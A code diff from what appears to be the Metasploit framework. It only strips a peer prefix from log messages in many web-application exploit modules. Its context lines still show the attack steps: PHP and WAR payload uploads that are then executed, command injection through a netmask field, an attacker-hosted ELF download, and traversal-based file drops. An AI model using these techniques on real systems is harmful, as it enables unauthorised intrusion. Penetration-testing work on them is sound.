b/modules/exploits/multi/http/mobilecartly_upload_exec.rb @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Upload payload # - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi({ 'uri' => normalize_uri(base, "/includes/savepage.php"), 'vars_get' => { @@ -97,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from server, will not continue.") + print_error("No response from server, will not continue.") return end # # Run payload # - print_status("#{peer} - Requesting '#{php_fname}'") + print_status("Requesting '#{php_fname}'") send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) }) handler diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 61272300d7..5053599cb9 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -70,7 +70,7 @@ class Metasploit4 < Msf::Exploit::Remote def check fingerprint = rand_text_alpha(5) - vprint_status("#{peer} - Sending check...") + vprint_status("Sending check...") begin res = http_send_raw(fingerprint) rescue Rex::ConnectionError @@ -90,7 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending payload...") + print_status("Sending payload...") http_send_cmd(payload.encoded) end diff --git a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb index 8b06d3c753..485fc65d39 100644 --- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb +++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb @@ -98,20 +98,20 @@ class Metasploit3 < Msf::Exploit::Remote ] unless not @netmask_eth0 cmds << %Q|rm /tmp/#{@elfname}.elf| unless target.name =~ /CMD/ - print_status("#{peer} - Restoring Network Information and Cleanup...") + print_status("Restoring Network Information and Cleanup...") begin session.shell_command_token(cmds.join(" ; ")) rescue - print_error("#{peer} - Automatic restore and cleanup didn't work, please use these commands:") + print_error("Automatic restore and cleanup didn't work, please use these commands:") cmds.each { |cmd| print_warning(cmd) } end - print_good("#{peer} - Restoring and Cleanup successful") + print_good("Restoring and Cleanup successful") end def start_web_service - print_status("#{peer} - Setting up the Web Service...") + print_status("Setting up the Web Service...") if datastore['SSL'] ssl_restore = true @@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote resource_uri = '/' + @elfname + '.elf' service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}" - print_status("#{peer} - Starting up our web service on #{service_url} ...") + print_status("Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote # wait for the data to be sent def wait_linux_payload - print_status("#{peer} - Waiting for the victim to request the ELF payload...") + print_status("Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) @@ -146,23 +146,23 @@ class Metasploit3 < Msf::Exploit::Remote end end - #print_status("#{peer} - Giving time to the payload to execute...") + #print_status("Giving time to the payload to execute...") #select(nil, nil, nil, 20) unless session_created? - print_status("#{peer} - Shutting down the web service...") + print_status("Shutting down the web service...") stop_service end # Handle incoming requests from the target def on_request_uri(cli, request) - vprint_status("#{peer} - on_request_uri called, #{request} requested") + vprint_status("on_request_uri called, #{request} requested") if (not @elf_data) - print_error("#{peer} - A request came in, but the ELF archive wasn't ready yet!") + print_error("A request came in, but the ELF archive wasn't ready yet!") return end - print_good("#{peer} - Sending the ELF payload to the target...") + print_good("Sending the ELF payload to the target...") @elf_sent = true send_response(cli, @elf_data) end @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Login with the provided credentials...") + print_status("Login with the provided credentials...") res = send_request_cgi({ 'method' => 'POST', @@ -194,13 +194,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 302 and res.headers['Location'] =~ /index.do/ and res.get_cookies =~ /JSESSIONID=(.*);/ - print_good("#{peer} - Login successful") + print_good("Login successful") session = $1 else fail_with(Failure::NoAccess, "#{peer} - Unable to login in Mutiny") end - print_status("#{peer} - Leaking current Network Information...") + print_status("Leaking current Network Information...") res = send_request_cgi({ 'method' => 'GET', @@ -216,16 +216,16 @@ class Metasploit3 < Msf::Exploit::Remote static_route_address = (res.body =~ /<input class="textInput" type="text" name="staticRouteAddress" value="(.*)" \/>/ ? $1 : "") static_route_netmask = (res.body =~ /<input class="textInput" type="text" name="staticRouteNetmask" value="(.*)" \/>/ ? $1 : "") static_route_gateway = (res.body =~ /<input class="textInput" type="text" name="staticRouteGateway" value="(.*)" \/>/ ? $1 : "") - print_good("#{peer} - Information leaked successfully") + print_good("Information leaked successfully") else - print_error("#{peer} - Error leaking information, trying to exploit with random values") + print_error("Error leaking information, trying to exploit with random values") end if target.name =~ /CMD/ injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3)) injection << "; #{payload.encoded}" else - print_status("#{peer} - Generating the ELF Payload...") + print_status("Generating the ELF Payload...") @elf_data = generate_payload_exe @elfname = Rex::Text.rand_text_alpha(3+rand(3)) service_url = start_web_service @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote end - print_status("#{peer} - Exploiting Command Injection...") + print_status("Exploiting Command Injection...") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/multi/http/nibbleblog_file_upload.rb b/modules/exploits/multi/http/nibbleblog_file_upload.rb index 290931c1c4..a0c53a5fe2 100644 --- a/modules/exploits/multi/http/nibbleblog_file_upload.rb +++ b/modules/exploits/multi/http/nibbleblog_file_upload.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response received from the target.') unless res session_cookie = res.get_cookies - vprint_status("#{peer} - Logging in...") + vprint_status("Logging in...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin.php'), @@ -103,13 +103,13 @@ class Metasploit3 < Msf::Exploit::Remote return end - vprint_status("#{peer} - Authenticating using #{username}:#{password}") + vprint_status("Authenticating using #{username}:#{password}") cookie = do_login(username, password) fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil? - vprint_good("#{peer} - Authenticated with Nibbleblog.") + vprint_good("Authenticated with Nibbleblog.") - vprint_status("#{peer} - Preparing payload...") + vprint_status("Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php" data = Rex::MIME::Message.new @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('auto', nil, nil, 'form-data; name="image_option"') post_data = data.to_s - vprint_status("#{peer} - Uploading payload...") + vprint_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'admin.php'), @@ -144,14 +144,14 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Unable to upload payload.') end - vprint_good("#{peer} - Uploaded the payload.") + vprint_good("Uploaded the payload.") php_fname = 'image.php' payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname) - vprint_status("#{peer} - Parsed response.") + vprint_status("Parsed response.") register_files_for_cleanup(php_fname) - vprint_status("#{peer} - Executing the payload at #{payload_url}.") + vprint_status("Executing the payload at #{payload_url}.") send_request_cgi( 'uri' => payload_url, 'method' => 'GET' diff --git a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb index 16676fc6bd..d9017acff1 100644 --- a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb +++ b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote # does not allow us to deploy WARs. Fix that by uploading a new context.xml file. # The file we are uploading has the same content apart from privileged="false" and lots of XML comments. # After replacing the context.xml file let's upload the WAR again. - print_status("#{peer} - Replacing Tomcat context file") + print_status("Replacing Tomcat context file") send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote }) else # We need to create the upload directories before our first attempt to upload the WAR. - print_status("#{peer} - Creating upload directories") + print_status("Creating upload directories") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ 'uri' => normalize_uri(servlet_path), @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote war_payload = payload.encoded_war({ :app_name => app_base }).to_s - print_status("#{peer} - Uploading WAR file...") + print_status("Uploading WAR file...") res = send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', @@ -117,14 +117,14 @@ class Metasploit3 < Msf::Exploit::Remote # The server either returns a 500 error or a 200 OK when the upload is successful. if res and (res.code == 500 or res.code == 200) - print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + + print_status("Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + " seconds for deployment") sleep(datastore['SLEEP']) else fail_with(Failure::Unknown, "#{peer} - WAR upload failed") end - print_status("#{peer} - Executing payload, wait for session...") + print_status("Executing payload, wait for session...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' @@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote sleep_counter = 0 while not session_created? if sleep_counter == datastore['SLEEP'] - print_error("#{peer} - Failed to get a shell, let's try one more time") + print_error("Failed to get a shell, let's try one more time") upload_war_and_exec(true, app_base) return end diff --git a/modules/exploits/multi/http/oracle_reports_rce.rb b/modules/exploits/multi/http/oracle_reports_rce.rb index 8c3f73bd2c..aa96081ab7 100644 --- a/modules/exploits/multi/http/oracle_reports_rce.rb +++ b/modules/exploits/multi/http/oracle_reports_rce.rb @@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 if res.body =~ /\\(.*)\\showenv/ - vprint_good "#{peer} - Windows install detected " + vprint_good "Windows install detected " path = $1.gsub("\\", "/") - vprint_status "#{peer} - Path: #{path}" + vprint_status "Path: #{path}" elsif res.body =~ /\/(.*)\/showenv/ - vprint_good "#{peer} - Linux install detected" - vprint_status "#{peer} - Path: #{$1}" + vprint_good "Linux install detected" + vprint_status "Path: #{$1}" else return Exploit::CheckCode::Safe end @@ -103,10 +103,10 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.downcase.exclude?("<html>") - vprint_good "#{peer} - URLPARAMETER is vulnerable" + vprint_good "URLPARAMETER is vulnerable" return Exploit::CheckCode::Vulnerable else - vprint_status "#{peer} - URLPARAMETER is not vulnerable" + vprint_status "URLPARAMETER is not vulnerable" return Exploit::CheckCode::Safe end @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote @payload_dir = datastore['PAYDIR'] @local_path = "" - print_status "#{peer} - Querying showenv!" + print_status "Querying showenv!" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"), 'method' => 'GET', @@ -127,17 +127,17 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 if res.body =~ /\\(.*)\\showenv/ - print_good "#{peer} - Query succeeded!" - print_status "#{peer} - Windows install detected " + print_good "Query succeeded!" + print_status "Windows install detected " @local_path = $1.gsub("\\", "/") - print_status "#{peer} - Path: #{@local_path }" + print_status "Path: #{@local_path }" elsif res.body =~ /\/(.*)\/showenv/ - print_good "#{peer} - Query succeeded!" - print_status "#{peer} - Linux install detected" + print_good "Query succeeded!" + print_status "Linux install detected" @local_path = $1 - print_status "#{peer} - Path: #{@local_path }" + print_status "Path: #{@local_path }" else - print_status "#{peer} - Query failed" + print_status "Query failed" fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable") end else @@ -145,14 +145,14 @@ class Metasploit3 < Msf::Exploit::Remote end if datastore['EXTURL'].blank? - print_status "#{peer} - Hosting payload locally ..." + print_status "Hosting payload locally ..." begin Timeout.timeout(datastore['HTTPDELAY']) {super} rescue Timeout::Error end exec_payload else - print_status "#{peer} - Using external url for payload delivery ..." + print_status "Using external url for payload delivery ..." @payload_url = datastore['EXTURL'] upload_payload exec_payload @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote end def upload_payload - print_status "#{peer} - Uploading payload ..." + print_status "Uploading payload ..." path = "/#{@local_path}#{@payload_dir}#{@payload_name}" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"), @@ -191,9 +191,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 - print_good "#{peer} - Payload hopefully uploaded!" + print_good "Payload hopefully uploaded!" else - print_status "#{peer} - Payload upload failed" + print_status "Payload upload failed" end end @@ -202,11 +202,11 @@ class Metasploit3 < Msf::Exploit::Remote gen_payload_name = rand_text_alpha(8+rand(8)) encoded_pl = Rex::Text.encode_base64(generate_payload_exe) - print_status "#{peer} - Building JSP shell ..." + print_status "Building JSP shell ..." len = encoded_pl.length if len >= 60000 #java string size limit ~60k workaround - print_status "#{peer} - Adjusting shell due to payload size" + print_status "Adjusting shell due to payload size" pl_first = encoded_pl.slice(0, 60000) pl_second = encoded_pl.slice(60000, len) big_payload = true @@ -252,8 +252,8 @@ class Metasploit3 < Msf::Exploit::Remote end def exec_payload - print_status("#{peer} - Our payload is at: /reports#{@payload_dir}#{@payload_name}") - print_status("#{peer} - Executing payload...") + print_status("Our payload is at: /reports#{@payload_dir}#{@payload_name}") + print_status("Executing payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name), @@ -261,9 +261,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 - print_good("#{peer} - Payload executed!") + print_good("Payload executed!") else - print_status("#{peer} - Payload execution failed") + print_status("Payload execution failed") end end end diff --git a/modules/exploits/multi/http/pandora_upload_exec.rb b/modules/exploits/multi/http/pandora_upload_exec.rb index 3db627caf4..e260323353 100644 --- a/modules/exploits/multi/http/pandora_upload_exec.rb +++ b/modules/exploits/multi/http/pandora_upload_exec.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote end return Exploit::CheckCode::Safe rescue ::Rex::ConnectionError - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") end return Exploit::CheckCode::Unknown @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote end # upload PHP payload to images/[fname] - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, php, cookies) @@ -146,13 +146,13 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (images/#{@fname})") + print_status("Executing payload (images/#{@fname})") begin res = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/http/php_volunteer_upload_exec.rb b/modules/exploits/multi/http/php_volunteer_upload_exec.rb index 8f8a58f69d..56dcda56d7 100644 --- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb +++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a cookie, bail! if res and res.get_cookies =~ /(PHPVolunteerManagent=\w+);*/ cookie = $1 - vprint_status("#{peer} - Found cookie: #{cookie}") + vprint_status("Found cookie: #{cookie}") else return nil end @@ -194,49 +194,49 @@ class Metasploit3 < Msf::Exploit::Remote password = datastore['PASSWORD'] cookie = login(base, username, password) if cookie.nil? - print_error("#{peer} - Login failed with \"#{username}:#{password}\"") + print_error("Login failed with \"#{username}:#{password}\"") return end - print_status("#{peer} - Login successful with #{username}:#{password}") + print_status("Login successful with #{username}:#{password}") # Take a snapshot of the uploads directory # Viewing this doesn't actually require the user to login first, # but we supply the cookie anyway to act more like a real user. - print_status("#{peer} - Enumerating all the uploads...") + print_status("Enumerating all the uploads...") before = peek_uploads(base, cookie) if before.nil? - print_error("#{peer} - Unable to enumerate original uploads") + print_error("Unable to enumerate original uploads") return end # Upload our PHP shell - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alpha(rand(10)+6) + '.php' desc = rand_text_alpha(rand(10)+5) php = %Q|<?php #{payload.encoded} ?>| res = upload(base, cookie, fname, php, desc) if res.nil? or res.body !~ /The file was successfuly uploaded/ - print_error("#{peer} - Failed to upload our file") + print_error("Failed to upload our file") return end # Now that we've uploaded our shell, let's take another snapshot # of the uploads directory. - print_status("#{peer} - Enumerating new uploads...") + print_status("Enumerating new uploads...") after = peek_uploads(base, cookie) if after.nil? - print_error("#{peer} - Unable to enumerate latest uploads") + print_error("Unable to enumerate latest uploads") return end # Find the filename of our uploaded shell files = get_my_file(before.body, after.body) if files.empty? - print_error("#{peer} - No new file(s) found. The upload probably failed.") + print_error("No new file(s) found. The upload probably failed.") return else - vprint_status("#{peer} - Found these new files: #{files.inspect}") + vprint_status("Found these new files: #{files.inspect}") end # There might be more than 1 new file, at least execute the first 10 diff --git a/modules/exploits/multi/http/phpfilemanager_rce.rb b/modules/exploits/multi/http/phpfilemanager_rce.rb index 5223279b46..ee92c2d006 100644 --- a/modules/exploits/multi/http/phpfilemanager_rce.rb +++ b/modules/exploits/multi/http/phpfilemanager_rce.rb @@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if res.nil? - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") fail_with(Failure::Unknown, "Failed to trigger the Enter button") end if res && res.headers && res.code == 302 - print_good("#{peer} - Logged in to the file manager") + print_good("Logged in to the file manager") cookie = res.get_cookies cookie else diff --git a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb index 6ce71ac09d..2eed181293 100644 --- a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb +++ b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote end upload_uri = normalize_uri(uri + "/" + payload_name) - print_status("#{peer} - Executing payload #{payload_name}") + print_status("Executing payload #{payload_name}") send_request_raw({ 'uri' => upload_uri, 'method' => 'GET' diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb index 340e9c6f02..ee5adbdc09 100644 --- a/modules/exploits/multi/http/polarcms_upload_exec.rb +++ b/modules/exploits/multi/http/polarcms_upload_exec.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/', nil, nil, "form-data; name=\"folder\"")) post_data = data.to_s - print_status("#{peer} - Uploading payload #{@payload_name}") + print_status("Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'includes', 'jquery.uploadify', "upload.php?folder=#{upload_dir}"), @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote end upload_uri = "#{upload_dir}#{@payload_name}" - print_status("#{peer} - Executing payload #{@payload_name}") + print_status("Executing payload #{@payload_name}") res = send_request_raw({ 'uri' => upload_uri, 'method' => 'GET' diff --git a/modules/exploits/multi/http/processmaker_exec.rb b/modules/exploits/multi/http/processmaker_exec.rb index e00a483e23..9a7f37a6ca 100644 --- a/modules/exploits/multi/http/processmaker_exec.rb +++ b/modules/exploits/multi/http/processmaker_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] # send payload - vprint_status("#{peer} - Attempting to execute: #{cmd}") + vprint_status("Attempting to execute: #{cmd}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, vuln_url), @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] # send login request - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', @@ -103,14 +103,14 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => vars_post }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE - print_error("#{peer} - Connection failed") + print_error("Connection failed") return false end if res and res.code == 200 and res.body =~ /Loading styles and images/ - print_good("#{peer} - Authenticated as user '#{user}'") + print_good("Authenticated as user '#{user}'") return true else - print_error("#{peer} - Authenticating as user '#{user}' failed") + print_error("Authenticating as user '#{user}' failed") return false end end @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote # send check fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = execute_command("echo #{fingerprint}") if res and res.body =~ /#{fingerprint}/ @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe @@ -156,11 +156,11 @@ class Metasploit3 < Msf::Exploit::Remote # upload payload code = "<?php #{payload.encoded} ?>" - print_status("#{peer} - Sending payload '#{@fname}' (#{code.length} bytes)") + print_status("Sending payload '#{@fname}' (#{code.length} bytes)") begin res = execute_command("echo \"#{code}\">#{@fname}", { :php_function => php_function } ) if res and res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") register_files_for_cleanup(@fname) else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote upload # execute payload - print_status("#{peer} - Retrieving file '#{@fname}'") + print_status("Retrieving file '#{@fname}'") send_request_cgi({'uri' => normalize_uri(target_uri.path, "#{@fname}")}) end end diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index 2b5fe040b1..ad3841acbc 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote end @clean_files.each do |f| - print_warning("#{peer} - Removing: #{f}") + print_warning("Removing: #{f}") begin if cli.type == 'meterpreter' cli.fs.file.rm(f) @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote cli.shell_command_token("rm #{f}") end rescue ::Exception => e - print_error("#{peer} - Unable to remove #{f}: #{e.message}") + print_error("Unable to remove #{f}: #{e.message}") end end end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0] # Get user data - vprint_status("#{peer} - Enumerating user data") + vprint_status("Enumerating user data") res = send_request_raw({ 'uri' => "#{base}/index.php/home/myAccount", 'cookie' => cookie @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote return {} if not res if res.code == 404 - print_error("#{peer} - #{username} does not actually have a 'myAccount' page") + print_error("#{username} does not actually have a 'myAccount' page") return {} end @@ -208,18 +208,18 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - Unable to request the file") + print_error("Unable to request the file") return end fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || '' if fname.empty? - print_error("#{peer} - Unable to extract the real filename") + print_error("Unable to extract the real filename") return end # Now that we have the filename, request it - print_status("#{peer} - Uploaded file was renmaed as '#{fname}'") + print_status("Uploaded file was renmaed as '#{fname}'") send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"}) handler end @@ -231,10 +231,10 @@ class Metasploit3 < Msf::Exploit::Remote user = datastore['USERNAME'] pass = datastore['PASSWORD'] - print_status("#{peer} - Attempt to login with '#{user}:#{pass}'") + print_status("Attempt to login with '#{user}:#{pass}'") opts = login(base, user, pass) if opts.empty? - print_error("#{peer} - Login unsuccessful") + print_error("Login unsuccessful") return end @@ -251,7 +251,7 @@ class Metasploit3 < Msf::Exploit::Remote p = get_write_exec_payload("/tmp/#{bin_name}", bin) end - print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...") + print_status("Uploading PHP payload (#{p.length.to_s} bytes)...") opts = opts.merge({ 'username' => user.scan(/^(.+)\@.+/).flatten[0] || '', 'email' => user, @@ -260,11 +260,11 @@ class Metasploit3 < Msf::Exploit::Remote }) uploader = upload_php(base, opts) if not uploader - print_error("#{peer} - Unable to upload") + print_error("Unable to upload") return end - print_status("#{peer} - Executing '#{php_fname}'") + print_status("Executing '#{php_fname}'") exec_php(base, opts) end end diff --git a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb index 31e262489c..29d59a6453 100644 --- a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb +++ b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif os == 'linux' && target.name =~ /Windows/ fail_with(Failure::BadConfig, "#{peer} - Linux system detected, but Windows target selected") elsif os.nil? - print_warning("#{peer} - Failed to detect remote operating system, trying anyway...") + print_warning("Failed to detect remote operating system, trying anyway...") end if target.name =~ /Windows.*VB/ @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote encoded_file_name = "#{rand_text_alpha(4 + rand(3))}.b64" exe_file_name = "#{rand_text_alpha(4 + rand(3))}.exe" - print_status("#{peer} - Dropping the encoded payload to filesystem...") + print_status("Dropping the encoded payload to filesystem...") write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64) vbs = generate_decoder_vbs({ @@ -137,13 +137,13 @@ class Metasploit3 < Msf::Exploit::Remote :encoded_file_name => encoded_file_name, :exe_file_name => exe_file_name }) - print_status("#{peer} - Dropping the VBS decoder to filesystem...") + print_status("Dropping the VBS decoder to filesystem...") write_file("#{traversal}#{temp}#{decoder_file_name}", vbs) register_files_for_cleanup("C:#{temp}#{decoder_file_name}") register_files_for_cleanup("C:#{temp}#{encoded_file_name}") register_files_for_cleanup("C:#{temp}#{exe_file_name}") - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute("#{traversal}\\#{win_dir}\\System32\\cscript //nologo C:#{temp}#{decoder_file_name}") end @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote decoder_file_name = "#{rand_text_alpha(4 + rand(3))}.sh" elf_file_name = "#{rand_text_alpha(4 + rand(3))}.elf" - print_status("#{peer} - Dropping the encoded payload to filesystem...") + print_status("Dropping the encoded payload to filesystem...") write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64) decoder = <<-SH @@ -172,17 +172,17 @@ chmod 777 #{temp}#{elf_file_name} #{temp}#{elf_file_name} SH - print_status("#{peer} - Dropping the decoder to filesystem...") + print_status("Dropping the decoder to filesystem...") write_file("#{traversal}#{temp}#{decoder_file_name}", decoder) register_files_for_cleanup("#{temp}#{decoder_file_name}") register_files_for_cleanup("#{temp}#{encoded_file_name}") register_files_for_cleanup("#{temp}#{elf_file_name}") - print_status("#{peer} - Giving execution permissions to the decoder...") + print_status("Giving execution permissions to the decoder...") execute("#{traversal}/bin/chmod 777 #{temp}#{decoder_file_name}") - print_status("#{peer} - Executing decoder and payload...") + print_status("Executing decoder and payload...") execute("#{traversal}/bin/sh #{temp}#{decoder_file_name}") end @@ -191,12 +191,12 @@ SH elf = rand_text_alpha(4 + rand(4)) traversal = "/.." * traversal_depth - print_status("#{peer} - Dropping payload...") + print_status("Dropping payload...") write_file("#{traversal}#{temp}#{elf}", payload.encoded) register_files_for_cleanup("#{temp}#{elf}") - print_status("#{peer} - Providing execution permissions...") + print_status("Providing execution permissions...") execute("#{traversal}/bin/chmod 777 #{temp}#{elf}") - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute("#{traversal}#{temp}#{elf}") end diff --git a/modules/exploits/multi/http/sflog_upload_exec.rb b/modules/exploits/multi/http/sflog_upload_exec.rb index cecbbc0ad0..bc898098c3 100644 --- a/modules/exploits/multi/http/sflog_upload_exec.rb +++ b/modules/exploits/multi/http/sflog_upload_exec.rb @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = data.to_s - print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") + print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}/admin/manage.php", @@ -120,15 +120,15 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from host") + print_error("No response from host") return end target_path = "#{base}/blogs/download/uploads/#{php_fname}" - print_status("#{peer} - Requesting '#{target_path}'...") + print_status("Requesting '#{target_path}'...") res = send_request_raw({'uri'=>target_path}) if res and res.code == 404 - print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}") + print_error("Upload unsuccessful: #{res.code.to_s}") return end @@ -141,11 +141,11 @@ class Metasploit3 < Msf::Exploit::Remote uri << '/' if 